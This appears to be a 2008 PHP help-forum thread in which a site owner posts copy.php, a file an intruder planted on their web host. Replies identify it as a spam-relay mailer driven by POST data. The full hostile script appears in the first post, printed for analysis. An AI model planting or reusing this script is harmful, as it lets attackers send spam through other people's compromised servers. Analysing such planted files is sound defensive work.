copy.php on my host

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
jeanius
Forum Newbie
Posts: 2
Joined: Sat Nov 29, 2008 6:48 am

copy.php on my host

Post by jeanius »

Hi there!
I am having an interesting experience as I have just received back my host information from someone that hacked in to my browser logs. I noticed a few new files on my host. And this is one of them:

copy.php

Code: Select all

<?
///////////////////////GET ENV//////////////////////////////////////////////////
if (isset($_POST['action']))
    {
    $action=$_POST['action'];
    }
else
 {
 print "<h1>Under construction!!!</h1>";
 exit;
 }
 
if ($action=="test")
 {
 print "test_ok";
 exit;
 }
 
if ($action=="send")
 {
  $from             = $_POST['from'];
  $subject          = $_POST['subject'];
  $message          = $_POST['message'];
  $emaillist        = $_POST['emaillist'];
  $random_mail      = $_POST['random_mail'];
  $random_name      = $_POST['random_name'];
  $realname         = $_POST['realname'];
  $replyto          = $_POST['replyto'];
  $random_reply     = $_POST['random_reply'];
  $subject          = $_POST['subject'];
  $random_sabj      = $_POST['random_sabj'];
  $mailfilename     = $_POST['mailfilename'];
  $mails_from_file  = $_POST['mails_from_file'];
  $log_to_file      = $_POST['log_to_file'];
//////////////////////CHECK DATA////////////////////////////////////////////////
 
////////////////////////////////////////////////////////////////////////////////
    $to = ereg_replace(" ", "", $to);
    $message = ereg_replace("&email&", $to, $message);
    $subject = ereg_replace("&email&", $to, $subject);
 
    $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
    $header .= "MIME-Version: 1.0\r\n";
/*    If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
    If ($file_name) $header .= "--$uid\r\n";*/
    $header .= "Content-Type: text/$contenttype; Charset=windows-1251\r\n";
    $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
    $header .= "$message\r\n";
/*    If ($file_name) $header .= "--$uid\r\n";
    If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
    If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
    If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
    If ($file_name) $header .= "$content\r\n";
    If ($file_name) $header .= "--$uid--";*/
    mail($to, $subject, "", $header);
print "ok";
}
?>
Could anyone tell me what this is made to perform?

Thanks 8)
pkbruker
Forum Commoner
Posts: 32
Joined: Sun Aug 03, 2008 9:36 am
Location: Oslo, Norway

Re: copy.php on my host

Post by pkbruker »

This script enables the outside "hacker" to use the server your site is on to send e-mails, probably spam. You REALLY should delete this file.

This is how it works:
By sending the correct URL to your site (i.e. "copy.php?action=send&from=myemail@thedomain.com...") the server your site is on will, based on the contents of the URL, send an e-mail.
mmj
Forum Contributor
Posts: 118
Joined: Fri Oct 31, 2008 4:00 pm

Re: copy.php on my host

Post by mmj »

pkbruker wrote:This script enables the outside "hacker" to use the server your site is on to send e-mails, probably spam. You REALLY should delete this file.

This is how it works:
By sending the correct URL to your site (i.e. "copy.php?action=send&from=myemail@thedomain.com...") the server your site is on will, based on the contents of the URL, send an e-mail.
Not exactly true, it would have to be POST data.

@OP:

Looks like a poorly written php mail script.
jeanius
Forum Newbie
Posts: 2
Joined: Sat Nov 29, 2008 6:48 am

Re: copy.php on my host

Post by jeanius »

Thank you for your quick responses!

Is there any way to search for malicious codes/files? My host is using cPanel.

I have many domains and subdirectories on it. So it's kind of hard to pick out what files I'm not supposed to have..
mmj
Forum Contributor
Posts: 118
Joined: Fri Oct 31, 2008 4:00 pm

Re: copy.php on my host

Post by mmj »

jeanius wrote:Thank you for your quick responses!

Is there any way to search for malicious codes/files? My host is using cPanel.

I have many domains and subdirectories on it. So it's kind of hard to pick out what files I'm not supposed to have..
A bit vague, but no, not really possible.
Post Reply